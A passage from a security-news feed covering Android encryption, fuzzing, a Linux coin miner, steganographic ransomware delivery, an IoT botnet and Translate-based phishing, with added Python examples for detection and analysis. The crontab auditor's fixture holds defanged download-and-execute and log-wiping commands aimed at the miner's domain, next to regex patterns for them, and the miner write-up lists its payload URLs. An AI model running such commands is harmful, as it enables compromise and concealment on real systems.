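    """Stand-in for Adiantum's NH/Poly1305 hash of (tweak, message): keyed BLAKE2s, 128 bits."""
    d = hashlib.blake2s(struct.pack("<I", len(tweak)) + tweak + data, key=hkey, digest_size=16).digest()
    return int.from_bytes(d, "little")


def _f64(bkey, rnd, half):
    return int.from_bytes(hashlib.blake2s(bytes([rnd]) + half.to_bytes(8, "little"),
                                          key=bkey, digest_size=8).digest(), "little")


def _perm128(bkey, x, inverse=False):
    """Stand-in for Adiantum's single AES block call: a 4-round keyed Feistel permutation."""
    l, r = x >> 64, x & MASK64
    for i in (range(3, -1, -1) if inverse else range(4)):
        l, r = (r ^ _f64(bkey, i, l), l) if inverse else (r, l ^ _f64(bkey, i, r))
    return (l << 64) | r


def derive_keys(master):
    """Three sub-keys from one 32-byte master key (toy KDF: BLAKE2s with a personalization)."""
    return {lbl: hashlib.blake2s(master, person=lbl, digest_size=32).digest()
            for lbl in (b"hash", b"block", b"stream")}


def _stream_params(cm):
    """Toy choice: the 16-byte middle value fills ChaCha's 4-byte counter and 12-byte nonce."""
    b = cm.to_bytes(16, "little")
    return struct.unpack("<I", b[:4])[0], b[4:]


def hbsh_encrypt(keys, tweak, pt):
    """Hash the bulk, encrypt the 16-byte tail, stream-encrypt the bulk keyed by that tail, hash again."""
    pl, pr = pt[:-16], int.from_bytes(pt[-16:], "little")
    pm = (pr + _h128(keys[b"hash"], tweak, pl)) & MASK128   # first hash, mixed into the tail
    cm = _perm128(keys[b"block"], pm)                         # block-cipher step on the tail
    cl = chacha20_xor(keys[b"stream"], *_stream_params(cm), pl)   # nonce derived from the tail
    cr = (cm - _h128(keys[b"hash"], tweak, cl)) & MASK128   # second hash, over the ciphertext
    return cl + cr.to_bytes(16, "little")


def hbsh_decrypt(keys, tweak, ct):
    """The same steps in reverse; the hash is re-derived from the ciphertext side."""
    cl, cr = ct[:-16], int.from_bytes(ct[-16:], "little")
    cm = (cr + _h128(keys[b"hash"], tweak, cl)) & MASK128
    pl = chacha20_xor(keys[b"stream"], *_stream_params(cm), cl)
    pm = _perm128(keys[b"block"], cm, inverse=True)
    pr = (pm - _h128(keys[b"hash"], tweak, pl)) & MASK128
    return pl + pr.to_bytes(16, "little")


def bytes_differing(a, b):
    return sum(x != y for x, y in zip(a, b))


def avalanche_demo(sector_size=4096):
    """Flip one plaintext bit in a sector and count the ciphertext bytes that change."""
    keys = derive_keys(b"\x01" * 32)                     # constructed master key
    tweak = (7).to_bytes(16, "little")                   # constructed sector number as the tweak
    pt = bytes(range(256)) * (sector_size // 256)
    flipped = bytearray(pt); flipped[100] ^= 0x01
    return bytes_differing(hbsh_encrypt(keys, tweak, pt), hbsh_encrypt(keys, tweak, bytes(flipped)))


if __name__ == "__main__":
    print(f"{avalanche_demo()} of 4096 ciphertext bytes changed after a one-bit plaintext flip")
```

Because the stream cipher’s nonce is derived from a hash of the whole plaintext, a single flipped bit re-keys the entire keystream, which is the wide-block behaviour the quote contrasts with XTS and CBC-ESSIV; the same hash taken over the ciphertext side on decryption is what makes the construction symmetric.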

Adiantum could represent the optimal solution for a wide range of devices that lack dedicated hardware for encryption, such as smartwatches, smart TVs, and other IoT devices running Android.

“Our hope is that Adiantum will democratize encryption for all devices. Just like you wouldn’t buy a phone without text messaging, there will be no excuse for compromising security for the sake of device performance.” wrote Eugene Liderman, Director of Mobile Security Strategy, Android Security & Privacy Team.

“Everyone should have privacy and security, regardless of their phone’s price tag.”

Google published technical details about the new encryption form in the paper titled “Adiantum: length-preserving encryption for entry-level processors.”

Pierluigi Paganini

(SecurityAffairs – Android, encryption)

The post Adiantum will bring encryption on Android devices without cryptographic acceleration appeared first on Security Affairs.

Google open sourced the ClusterFuzz fuzzing platform

Google has open sourced ClusterFuzz, the fuzzing infrastructure it developed to find memory corruption vulnerabilities in Chrome.

Google has open sourced its fuzzing infrastructure ClusterFuzz that the tech giant developed to find memory corruption bugs in the Chrome browser.

ClusterFuzz is a scalable fuzzing tool that can run on clusters with more than 25,000 cores.

The platform has been available as a free service to open source projects through the OSS-Fuzz service. 

“Fuzzing is an automated method for detecting bugs in software that works by feeding unexpected inputs to a target program. It is effective at finding memory corruption bugs, which often have serious security implications.” reads a blog post published by Google.

“Manually finding these issues is both difficult and time consuming, and bugs often slip through despite rigorous code review practices. For software projects written in an unsafe language such as C or C++, fuzzing is a crucial part of ensuring their security and stability.”

The fuzzing test methodology is effective in detecting bugs in software on a large scale, especially when it is directly integrated with the development process.

ClusterFuzz was created more than 8 years ago to provide end-to-end automation, from bug detection, to triage (accurate deduplication, bisection), to bug reporting, and finally to automatic closure of bug reports.
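The pipeline described above (feed mutated inputs, catch crashes, deduplicate, reduce) in miniature, as an added Python example unrelated to the ClusterFuzz code base: a constructed length-prefixed record parser with two index-past-the-end bugs plays the target, a mutation fuzzer drives it, crashes are deduplicated by exception type and innermost frame, and each unique crash is greedily reduced to a smaller reproducer. The parser, the seed input and the mutation set are this example’s own constructions.

```python
import random
import traceback


def parse_records(buf):
    """Constructed target: parse a stream of [type:1][len:1][value:len] records.
    Two bugs: a trailing type byte with no length byte, and a declared length
    longer than the data; both index past the end, the Python stand-in for an
    out-of-bounds read."""
    i, records = 0, []
    while i < len(buf):
        rtype, n = buf[i], buf[i + 1]          # bug A: no bounds check on i + 1
        value = buf[i + 2:i + 2 + n]
        if rtype == 2:
            records.append(value[n - 1])       # bug B: trusts n over len(value)
        else:
            records.append(value)
        i += 2 + n
    return records


def mutate(data, rng):
    """One random byte-level mutation: bit flip, interesting byte, insert, delete."""
    data = bytearray(data)
    op = rng.randrange(4)
    if op == 0 and data:
        data[rng.randrange(len(data))] ^= 1 << rng.randrange(8)
    elif op == 1 and data:
        data[rng.randrange(len(data))] = rng.choice((0x00, 0x01, 0x7F, 0x80, 0xFF))
    elif op == 2:
        data.insert(rng.randrange(len(data) + 1), rng.randrange(256))
    elif data:
        del data[rng.randrange(len(data))]
    return bytes(data)


def run_once(target, data):
    """Run the target; return a crash signature, or None if it returned normally."""
    try:
        target(data)
        return None
    except Exception as exc:            # triage key: exception type + innermost frame
        frame = traceback.extract_tb(exc.__traceback__)[-1]
        return (type(exc).__name__, frame.name, frame.lineno)


def minimize(target, data, signature):
    """Greedy reduction: drop single bytes while the same crash signature persists."""
    shrunk = True
    while shrunk:
        shrunk = False
        for i in range(len(data)):
            candidate = data[:i] + data[i + 1:]
            if candidate and run_once(target, candidate) == signature:
                data, shrunk = candidate, True
                break
    return data


def fuzz(target, seeds, iterations=2000, rng_seed=1):
    """Mutation fuzzing loop: returns {crash signature: minimized reproducer}."""
    rng = random.Random(rng_seed)
    corpus = list(seeds)
    crashes = {}
    for _ in range(iterations):
        data = rng.choice(corpus)
        for _ in range(rng.randrange(1, 4)):  # stack one to three mutations
            data = mutate(data, rng)
        signature = run_once(target, data)
        if signature is not None and signature not in crashes:
            crashes[signature] = minimize(target, data, signature)
    return crashes


SEEDS = [b"\x01\x03abc\x02\x02xy"]   # constructed well-formed input: two records

if __name__ == "__main__":
    for sig, repro in fuzz(parse_records, SEEDS).items():
        print(sig, repro)
```

Deduplicating by the crashing frame rather than by input is what keeps the report count at two here even though thousands of inputs crash; the same idea, scaled up with stack hashing, bisection and coverage feedback, is the triage work the article attributes to ClusterFuzz.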

Google confirmed that to date, ClusterFuzz discovered over 16,000 vulnerabilities in Chrome and more than 11,000 vulnerabilities across more than 160 open source projects integrated with OSS-Fuzz.

“It is an integral part of the development process of Chrome and many other open source projects. ClusterFuzz is often able to detect bugs hours after they are introduced and verify the fix within a day.” continues the blog post.

“Check out our GitHub repository. You can try ClusterFuzz locally by following these instructions.”


ClusterFuzz can also be installed locally on a computer cluster.

Pierluigi Paganini

(SecurityAffairs – ClusterFuzz, hacking)

The post Google open sourced the ClusterFuzz fuzzing platform appeared first on Security Affairs.

New Linux coin miner kills competing malware to maximize profits

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner.

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner, researchers observed it killing other Linux malware and coin miners present on the infected machine.


The experts detected a coinminer script on one of their honeypots; the malicious code shares some parts with the Xbash malware and the KORKERDS cryptocurrency miner, which leverages a rootkit to avoid detection.

“We found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS.” reads the analysis published by Trend Micro.

“It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.”

Experts noticed that this specific variant of KORKERDS leverages the rootkit to download a binary of a modified version of a universal Stratum XMR-Stak pool miner.

According to the experts, the infection started from some IP cameras and web services via TCP port 8161, where the attacker attempts to upload a crontab file.

The crontab file launches a second stage that implements the following three functions:

  • Function B kills previously installed malware, coin miners, and all related services referenced by an accompanying malware (detected by Trend Micro as SH.MALXMR.UWEIU). It also creates new directories and files, and stops processes with connections to identified IP addresses.
  • Function D downloads the coin miner binary from hxxp://yxarsh.shop/64 and runs it.
  • Function C downloads a script from hxxp://yxarsh.shop/0, saves it to the /usr/local/bin/dns file, and creates a new crontab to call this script at 1 a.m. It also downloads hxxp://yxarsh.shop/1.jpg and puts it in different crontabs.

The malware attempts to hide its presence by clearing system logs and achieves persistence using implanted crontab files.

Compared to the original KORKERDS cryptocurrency miner, the new script improved the way it downloads and executes the files. It inserts a single crontab that fetches all the code and the miner component.
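An added example, not Trend Micro’s tooling, that audits crontab text for the shapes the three functions above imply: the two indicators quoted in the article, download-and-execute one-liners, and commands that truncate or delete files under /var/log. The sample crontab is constructed, with the malicious domain defanged exactly as on the page; the regular expressions and reason labels are this example’s own.

```python
import re

# Indicators quoted in the article (domain defanged as on the page)
KNOWN_IOCS = ("yxarsh.shop", "/usr/local/bin/dns")

# A cron job should not fetch remote content and run it in the same line
DOWNLOAD_EXEC = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b"                      # curl ... | sh
    r"|\b(?:curl|wget)\b.*?&&\s*(?:chmod\s+\+x|\./|(?:ba)?sh\s)"     # wget ... && chmod +x / ./x
)
# Truncating or deleting logs; append redirects such as ">>" are left alone
LOG_WIPE = re.compile(r"(?<!>)>\s*/var/log/|\brm\b[^;&|]*\s/var/log/")
# "m h dom mon dow <command>" or "@reboot <command>" (user crontab layout)
CRON_LINE = re.compile(r"^\s*(@\w+|\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.+)$")

# Constructed crontab: one benign job, then jobs with the shape of functions C and D above
SAMPLE_CRONTAB = """\
# constructed: a benign nightly backup
30 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
# constructed: jobs with the shape of functions C and D above
0 1 * * * /usr/local/bin/dns
*/10 * * * * curl -fsSL hxxp://yxarsh.shop/0 | sh
@reboot wget -q -O /tmp/.x hxxp://yxarsh.shop/1.jpg && chmod +x /tmp/.x && /tmp/.x
15 3 * * * cat /dev/null > /var/log/syslog
"""


def audit_crontab(text):
    """Return one finding per suspicious job: line number, schedule, command, reasons."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#"):
            continue
        schedule, cmd = m.groups()
        reasons = []
        if any(ioc in cmd for ioc in KNOWN_IOCS):
            reasons.append("known indicator")
        if DOWNLOAD_EXEC.search(cmd):
            reasons.append("download-and-execute")
        if LOG_WIPE.search(cmd):
            reasons.append("log wiping")
        if reasons:
            findings.append({"line": n, "schedule": schedule, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']:>3} [{f['schedule']}] {', '.join(f['reasons'])}: {f['command']}")
```

The generic patterns matter more than the two literal indicators: the article notes the miner rotates through several crontabs and a single fetch-all crontab, so a job that downloads and executes in one line is the durable signal, while domain names change. System-wide files such as /etc/crontab carry an extra user field after the schedule and would need the pattern extended before use there.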

“While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit.” concludes Trend Micro.

Further details, including indicators of compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – coin miner, malware)

The post New Linux coin miner kills competing malware to maximize profits appeared first on Security Affairs.

Security Affairs newsletter Round 200 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal: 20% discount on the Kindle Edition and the Paper Copy.

Once again thank you!

Can Enterprises execute a GRC Movement?
Experts observed a new sextortion scam Xvideos-themed
Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail
Experts found popular beauty apps in the Play Store including malicious code
Metro Bank is the first bank that disclosed SS7 attacks against its customers
QuadrigaCX exchange lost access to $145 Million funds after founder dies
Security firm Recorded Future discovered the hacker behind Collection #1
Young hacker gets 10 years jail sentence for SIM Swapping attacks
Roughly 500,000 Ubiquiti devices may be affected by flaw already exploited in the wild
Severe bug in LibreOffice and OpenOffice suites allows remote code execution
SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM.
A critical counterfeiting vulnerability addressed in Zcash
New ExileRAT backdoor used in attacks aimed at users in Tibet
Reverse RDP Attack – Rogue RDP Server can be used to hack RDP clients
Security expert Marco Ramilli released for free the Malware Hunter tool
Android devices could be hacked by viewing a malicious PNG Image
Expert publicly disclosed the existence of 0day flaw in macOS Mojave
Ursnif: Long Live the Steganography and AtomBombing!
Hackers broke into Australia’s Parliament Computer Network
NITEC19 – NATO Opens Defense Innovation Challenge calls for C4ISR solutions
Phishing campaign leverages Google Translate as camouflage
Three out of the four flaws fixed with iOS 12.1.4 were exploited in the wild
Vulnerabilities in Kunbus Industrial Gateway allows to control the devices
Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem
GandCrab ransomware campaign targets Italy using steganography

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 200 – News of the week appeared first on Security Affairs.

GandCrab ransomware campaign targets Italy using steganography

A newly discovered malware campaign leverages steganography to hide GandCrab ransomware in an apparently innocent Mario image.

Security experts at Bromium have discovered a malware campaign using steganography to hide the GandCrab ransomware in a Mario graphic package.

According to Matthew Rowan, a researcher at Bromium, threat actors use steganography to hide the malicious code and avoid AV detection.

The steganography is used in conjunction with heavily obfuscated Microsoft PowerShell commands that attackers have hidden within the color channels of a picture of Mario, in particular by manipulating the blue and green pixels.

“Steganographic techniques such as using the low-bits from pixel values are clearly not new, but it’s rare that we see this kind of thing in malspam; even at Bromium, where we normally see slightly more advanced malware that evaded the rest of the endpoint security stack.” reads the analysis published by Rowan.

“A manual re-shuffle to de-obfuscate the code and you can see more clearly the bitwise operation on the blue and green pixels. Since only the lower 4 bits of blue and green have been used, this won’t make a big difference to the image when looked at by a human, but it is quite trivial to hide some code within.”

This technique makes the threat hard to detect for firewalls and other defence systems, because the image itself looks benign.
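As an added illustration of the low-nibble technique Rowan describes (not code from Bromium’s analysis), the following shows both sides: a constructed helper that writes one byte per pixel into the low 4 bits of green and blue, and the analyst routines that rebuild that stream, flag an image whose low-nibble stream carries runs of printable text, and recover the text. Images are modelled as lists of (r, g, b) tuples so it runs without an imaging library; which channel holds the high nibble is an assumption of the example, not something the article states.

```python
import random

# Printable ASCII plus tab/LF/CR: what script text (the article's case: PowerShell) looks like.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def make_cover(seed=1, n_pixels=1024):
    """Constructed stand-in for an image: a list of (r, g, b) tuples with pseudo-random values."""
    rng = random.Random(seed)
    return [(rng.randrange(256), rng.randrange(256), rng.randrange(256)) for _ in range(n_pixels)]


def embed_low_nibbles(pixels, payload):
    """Constructed sample generator: write one payload byte per pixel into the low 4 bits of green
    (high nibble) and blue (low nibble), the scheme the article describes. Used only to build test data."""
    if len(payload) > len(pixels):
        raise ValueError("payload does not fit in the image")
    out = list(pixels)
    for i, byte in enumerate(payload):
        r, g, b = out[i]
        out[i] = (r, (g & 0xF0) | (byte >> 4), (b & 0xF0) | (byte & 0x0F))
    return out


def extract_low_nibbles(pixels, length=None):
    """Analyst side: rebuild the byte stream carried in the low nibbles of green and blue."""
    if length is None:
        length = len(pixels)
    return bytes(((g & 0x0F) << 4) | (b & 0x0F) for _, g, b in pixels[:length])


def printable_ratio(data):
    return sum(b in PRINTABLE for b in data) / len(data) if data else 0.0


def scan_low_nibbles(pixels, window=32, threshold=0.9):
    """Flag an image whose low-nibble stream contains windows that are almost entirely printable text.
    Untouched low bits of a photo behave like noise (roughly 38% of random bytes are printable), so a
    32-byte window at 90%+ printable is a strong signal that text was written into the channels."""
    stream = extract_low_nibbles(pixels)
    hits = [start for start in range(0, len(stream) - window + 1, window)
            if printable_ratio(stream[start:start + window]) >= threshold]
    return {"flagged": bool(hits), "first_hit": hits[0] if hits else None, "hit_windows": len(hits)}


def recover_text(pixels, start=0):
    """Return the contiguous printable run starting at the given offset of the low-nibble stream."""
    stream = extract_low_nibbles(pixels)
    end = start
    while end < len(stream) and stream[end] in PRINTABLE:
        end += 1
    return stream[start:end].decode("ascii")


# Constructed payload: harmless text standing in for the campaign's hidden script.
CONSTRUCTED_PAYLOAD = b"# constructed sample payload, not the campaign's script\nWrite-Host 'stego test'\n"

if __name__ == "__main__":
    clean = make_cover()
    stego = embed_low_nibbles(clean, CONSTRUCTED_PAYLOAD)
    print("clean:", scan_low_nibbles(clean))
    print("stego:", scan_low_nibbles(stego))
    print(recover_text(stego, scan_low_nibbles(stego)["first_hit"]))
```

The printable-run check is what makes this usable as a triage step: it does not need to know the key or the exact channel layout in advance, only that script text, unlike sensor noise, is almost entirely printable. On a real file, convert the image to an RGB pixel list with any imaging library and hand it to the same functions.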

Experts pointed out that attackers are targeting users in Italy, but the campaign will likely extend to other countries worldwide.

“The manually de-obfuscated PowerShell reveals the final level which is dropping and executing from a site, but only if the output of ‘get-culture’ on the machine matches “ita” (for example if the culture is Italian, which matches the earlier targeting attempts).” continues the expert.


Experts were able to download the samples from the address in the de-obfuscated PowerShell, including from an Italy-based VPN, and discovered several samples of the GandCrab ransomware.

Additional details, including IoCs, are reported in the analysis published by the security firm Bromium.

Pierluigi Paganini

(SecurityAffairs – steganography, hacking)


The post GandCrab ransomware campaign targets Italy using steganography appeared first on Security Affairs.

Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem

Cayosin Botnet: a deeper look at this threat supported by the psychological profile of the “youngsters-wannabe-hackers” Rolex boasters


Money, botnet-as-a-service business, and coding on the dark side of life: “At this point of my life… if it doesn’t make me money, I don’t make time for it”, states the picture below.

Elsewhere the same threat actor makes a more blatant statement, in a sentence that sounds like “I am not scared by death, I am more scared of not living a pleasant life.”

Image downloaded by Odisseus from the Instagram profile of the threat actor

This is the “new” motto of those youngsters-wannabe-hackers: botnet providers, sellers, coders, “boaters” driving in the night with the laptop always connected at their side. In the imaginary world of a teen the adult world becomes a violent jungle dominated by the dark colors of a delirium of omnipotence. Botnet, packet flooding, bots, power of attack: “I don’t care how many and what bots I have, all I care is only to have stable stress power”.

It is in this psychedelic context that the Cayosin botnet has seen the light and, for the first time, has been reversed and analyzed (the report is here) by “unixfreaxjp” of the MalwareMustDie team.

The analysis is sapient and clear: the reversed samples contain many traces of a collection of attacks that lead back to a collection of different source codes.

One of them is the Layer 7 (HTTP) attack shown in the picture below, which documents how this kind of malware can evade anti-DDoS solutions like Cloudflare.


From unixfreaxjp’s analysis of the Cayosin botnet binary we can understand that the core of the artifact is the “integration” of different botnet source codes, as is also well documented by reading the now-deleted Instagram profile of the 13-year-old scriptbots/unholdable, who implemented this botnet. The STD attack, Tsunami and Christmas DDoS attacks were adapted from the Kaiten botnet, along with more flood combinations taken from Qbot/Lizkebab/Torlus/Gafgyt variants: multiple attack methods integrating multiple source codes in the same artifact, provided “as a service” to other teens or threat actors and sold offhandedly on Instagram. From the Mirai source code Cayosin took the table scheme used to hide the strings the botnet uses to break into vulnerable telnet accounts on known IoT devices, along with other Mirai botnet functionalities. Obviously, the coder did not update much of the C2 feature set, which explains why the base protocol of the botnet is still built on a Qbot/Torlus basis.

A ready-to-use botnet build sold for $20 a month, “full options”, with an expiry token and functionality able to ban users who did not renew the expired “licence”.

The combination of several capabilities in the botnet has also been well documented by the PERCH Security Threat Report, which made a great analysis of it, confirming the combination of these functionalities in Cayosin along with a deeper OSINT investigation of the threat’s source.

The PERCH report states: “Cayosin largely recycles exploits utilized by other botnets, like Mirai, though the injections reference”, like the GPON attack that was documented on the Instagram profile of the crew, so clearly that an external observer could easily follow the day-by-day findings of new exploits and methods, later implemented in the malware to enrich the harmful capability of the new “product”.
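The Mirai-derived “table scheme” mentioned above keeps the botnet’s strings (device credentials, paths, protocol fragments) XOR-encoded in the binary and decodes each one only while it is in use. The analyst-side routine below is an added example, not code from the MalwareMustDie report or from any Cayosin sample: it recovers such a table from a carved byte blob, either with the key derived the way the leaked Mirai source derives it (the four bytes of 0xDEADBEEF XORed in turn, which collapses to 0x22) or by trying all 256 single-byte keys and scoring for NUL-separated printable text, which also covers variants that changed the constant. The table contents are constructed for the example.

```python
import string

# string.printable (letters, digits, punctuation, whitespace) encoded as bytes.
PRINTABLE = set(string.printable.encode("ascii"))


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def mirai_effective_key(table_key=0xDEADBEEF):
    """The leaked Mirai source XORs every byte with each of the four bytes of a 32-bit key in turn,
    which is the same as one XOR with all four key bytes combined (0x22 for 0xDEADBEEF)."""
    k = 0
    for shift in (0, 8, 16, 24):
        k ^= (table_key >> shift) & 0xFF
    return k


def score_plaintext(data):
    """Fraction of bytes that are printable or the NUL terminator separating table entries."""
    if not data:
        return 0.0
    return sum(b == 0 or b in PRINTABLE for b in data) / len(data)


def find_xor_key(blob):
    """Try every single-byte key (variants change the constant) and keep the one that yields
    NUL-separated printable text; ties go to the lowest key."""
    return max(range(256), key=lambda k: (score_plaintext(xor_bytes(blob, k)), -k))


def recover_strings(blob, key=None, min_len=3):
    """Decode an obfuscated string table and return (key, strings)."""
    if key is None:
        key = find_xor_key(blob)
    plain = xor_bytes(blob, key)
    strings = [s.decode("ascii", "replace") for s in plain.split(b"\x00") if len(s) >= min_len]
    return key, strings


# Constructed table contents for the example (not strings from a Cayosin sample). Each entry is
# stored NUL-terminated, as the Mirai table.c entries are, then XOR-obfuscated.
CONSTRUCTED_TABLE = [b"/bin/busybox", b"admin", b"root", b"/dev/watchdog",
                     b"POST /cdn-cgi/ HTTP/1.1", b"listening tun0"]


def build_sample_blob(strings, key):
    """Produce the obfuscated bytes an analyst would carve out of the binary's data section."""
    return b"".join(xor_bytes(s + b"\x00", key) for s in strings)


if __name__ == "__main__":
    blob = build_sample_blob(CONSTRUCTED_TABLE, mirai_effective_key())
    key, found = recover_strings(blob)
    print(f"key=0x{key:02x}")
    for s in found:
        print(" ", s)
```

Recovering the table this way is what turns a stripped ELF sample into indicators: the credential pairs, C2 hostnames and request templates a Mirai-lineage bot carries are exactly the strings the scheme hides, and the key search means a re-keyed variant does not need manual reversing first.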

They candidly state this in their Instagram Stories: “New Methods, DM me if you want to know more.”


Image downloaded by Odisseus from the Instagram profile of the threat actor

PERCH has understood it well; in fact it writes: “This is not the team’s first tool. They have created a few along the way like Summit, Tragic, and about a dozen others. You can learn more about these tools by following the various Instagram accounts of the crew. They seem interested in building tools to DDoS and boast about taking down services with OVH, Choopa, NFO – and if the hype is real, maybe even Rocket League servers.”

At this point it cannot be excluded that Cayosin is only an evolution of many other botnets made by the same threat actor (or crew), and in particular of the botnet named Messiah. Below is the advertising of the Messiah botnet, with features that recall Cayosin’s capabilities. Check the following exclusive image:

  • Features:  Admin of accounts, Add user commands, Kick user commands, Full chat, On line user list, Bot limits for account, Full bot type list, Port Scanner and Resolver
  • Methods: Reg UDP, Reg TCP, STD Hex, CNC Flood, Stomp Flood, Xmas and VSE
  • Replication Exploits: GPON, Telnet, Realtek, Tr064, Huawai

Image downloaded by Odisseus from the Instagram profile of the threat actor

What we learn from the evolution of botnets is the adaptation of source codes: once one bad-actor coder starts to implement something different and other coders find it useful, they adopt the capability by merging source codes. Each coder and botnet provider is racing against the others to present their botnet technology as the better one, in order to attract the market: youngsters and actors interested in renting the best service.

The conclusion is given by the MalwareMustDie team, the group we all know for their struggle over the years against botnet coders, through their public tweet, which shows how this situation can be summarized by a simple fact: “Money”. “The veteran DDoS botnet hackers are facilitating frameworks for surviving the DDoS ELF IoT botnet as the income engine: from coordination to each type of coders, linking DDoS-As-Service sites (known as Stressers or Bruters) to providing the botnet control via API, then supplying infrastructure, assisting the newbies with setups, with all this effort these veterans are urging and provoking green and young actors to do their own botnets. The money scheme is following in these processes by first taking these youngster “weekly allowance”, then getting merit the botnets used by the rented “boaters”, till making profits from cuts taken from case by case with the arrangement of API used for Bruters/Stressers platform for the attackers that pays the service for DDoS.”

In the end, this is all about the money circulation scheme that fuels the existence of IoT botnets, their coders and the stressers behind them. Disrupting this money flow may give us a chance to disrupt this badness strongly enough to force the scheme into discontinuation.

Additional glossary:
*) boaters: those who use the rented botnet
*) herders: those who herd the botnet
*) stressers or bruters: the front end of DDoS-as-a-Service sites

About the Author:

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

“unixfreaxjp” – member of the MalwareMustDie team.

Pierluigi Paganini

(SecurityAffairs – Cayosin Botnet, cybercrime)


The post Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem appeared first on Security Affairs.

NITEC19 – NATO Opens Defense Innovation Challenge calls for C4ISR solutions

The NATO Communications and Information Agency (NCI) announced the opening of the fourth annual Defense Innovation Challenge (NITEC19) to start-ups, SMEs and academia.


The Agency calls for proposals on solutions that could support NATO’s command, control, communications, computers, intelligence, surveillance and reconnaissance (C4ISR) and of course to improve cyber capabilities.

According to the official website, the challenge focuses on data science and natural language processing; for this reason, the NCI Agency is accepting submissions in the following priority areas:

  • Data science tools and approaches for a) Natural Language Processing for semantics and sentiment analysis, or b) processing data from maritime environments;
  • Capabilities for sensing the maritime environment;
  • Solutions to the telecommunication challenges of the High North.

The challenge aims at accelerating transformational, state-of-the-art technology solutions from participants to support NATO’s C4ISR and improve its cyber capabilities.

“The NITEC innovation challenge,” said Mike Street, Head of innovation and data science at the NCI Agency, “is a great way for a wide range of companies and organizations to share their innovative products and services with the NCI Agency. It is one of the routes we use to ensure that NATO’s technology experts stay aware of how innovative technologies are being applied.”

The top ten proposals will be presented in a 5-minute pitch during the plenary session of the NITEC19 event. The winner will receive a prize of 10 000 EUR and will also be tasked with running a formal pilot with the NCI Agency to demonstrate their solution.

“We are seeking to broaden engagement with innovative technology drivers as NATO undergoes its largest technological modernization in decades,” said NCI Agency General Manager Kevin J. Scheid.

Proposals must be received by 22 March, and the Agency will announce the winners on 8 April.

Pierluigi Paganini

(SecurityAffairs – NITEC19, NATO)

The post NITEC19 – NATO Opens Defense Innovation Challenge calls for C4ISR solutions appeared first on Security Affairs.

Phishing campaign leverages Google Translate as camouflage

Crooks leverage Google Translate service as camouflage on mobile browsers in a phishing campaign aimed at stealing Google account and Facebook credentials.

The security expert Larry Cashdollar, a member of Akamai’s Security Intelligence Response Team (SIRT), discovered that cybercriminals are carrying out a new Phishing attack that leverages Google Translate as camouflage.

The phishing campaign targets both Google and Facebook accounts; the use of Google Translate allows the attackers to make the phishing page appear as a legitimate form served from a Google domain. The technique makes the attack harder to detect on mobile browsers.

These phishing emails pose as alerts sent by Google that inform users that their accounts were accessed from a new Windows device. The malicious emails come with a subject of “Security Alert,” they attempt to trick victims to click on the “Consult the activity” button to receive more information about the potential unauthorized access.

When a user clicks on the link embedded in the phishing message, he will be redirected to a Google Translate page that opens up a phishing page that appears to be a Google Account login. 

The expert pointed out that this kind of attack could be easily detected by users on desktop browsers because the Translate toolbar is visible.

On mobile browsers it is much more difficult to recognize that the displayed page is the result of Google Translate, because the interface of the service is minimal.

“Using Google Translate does a number of things; it fills the URL (address) bar with lots of random text, but the most important thing visually is that the victim sees a legitimate Google domain. In some cases, this trick will help the criminal bypass endpoint defenses.” reads the analysis published by Cashdollar.

“However, while this method of obfuscation might enjoy some success on mobile devices (the landing page is a near-perfect clone of Google’s older login portal), it fails completely when viewed from a computer.”
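A mail-filtering check for the wrapping trick described above, as an added example (not Akamai’s or Cashdollar’s code): it recognizes a link that goes through Google Translate, extracts the host the translated page is really fetched from, and compares it with the hosts a genuine login link would use. Two wrapper forms are handled: the translate.google.com/translate?u=... query form and the per-site *.translate.goog proxy hostname, whose decoding (dots as single hyphens, original hyphens doubled) is an assumption of this example. All sample links use the reserved .test domain.

```python
from urllib.parse import parse_qs, urlsplit

TRANSLATE_PROXY_SUFFIX = ".translate.goog"


def is_translate_host(host):
    return host == "translate.google.com" or host.startswith("translate.google.")


def decode_proxy_host(encoded):
    """Assumed encoding of the *.translate.goog proxy form: dots become '-', original hyphens become '--'."""
    return encoded.replace("--", "\x00").replace("-", ".").replace("\x00", "-")


def unwrap_translate_url(url):
    """Return (wrapped, target_host): whether the URL goes through Google Translate and the host the
    translated page is actually fetched from (None if a wrapped URL names no target)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if is_translate_host(host):
        target = parse_qs(parts.query).get("u", [None])[0]
        return True, ((urlsplit(target).hostname or "").lower() if target else None)
    if host.endswith(TRANSLATE_PROXY_SUFFIX):
        return True, decode_proxy_host(host[: -len(TRANSLATE_PROXY_SUFFIX)])
    return False, host


def assess_link(url, expected_hosts):
    """Verdict for a link found in a mail claiming to come from one of expected_hosts."""
    wrapped, target = unwrap_translate_url(url)
    if not wrapped:
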